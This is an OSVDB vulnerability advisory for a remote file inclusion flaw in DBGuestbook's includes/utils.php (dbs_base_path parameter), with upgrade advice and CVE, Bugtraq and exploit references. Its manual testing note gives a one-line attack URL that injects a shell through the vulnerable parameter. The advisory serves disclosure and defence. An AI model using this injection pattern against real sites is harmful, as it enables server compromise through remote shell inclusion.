DBGuestbook includes/utils.php dbs_base_path Variable Remote File Inclusion

2007-02-21T05:39:12
ID OSVDB:33495
Type osvdb
Reporter OSVDB
Modified 2007-02-21T05:39:12

Description

Solution Description

Upgrade to version 1.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/path/includes/utils.php?dbs_base_path=[SHELL]

References:

Vendor URL: http://www.dbscripts.net/guestbook/ Related OSVDB ID: 33493 Related OSVDB ID: 33494 Mail List Post: http://archives.neohapsis.com/archives/apps/freshmeat/2007-02/0021.html Generic Exploit URL: http://www.milw0rm.com/exploits/3354 FrSIRT Advisory: ADV-2007-0693 CVE-2007-1165 Bugtraq ID: 22658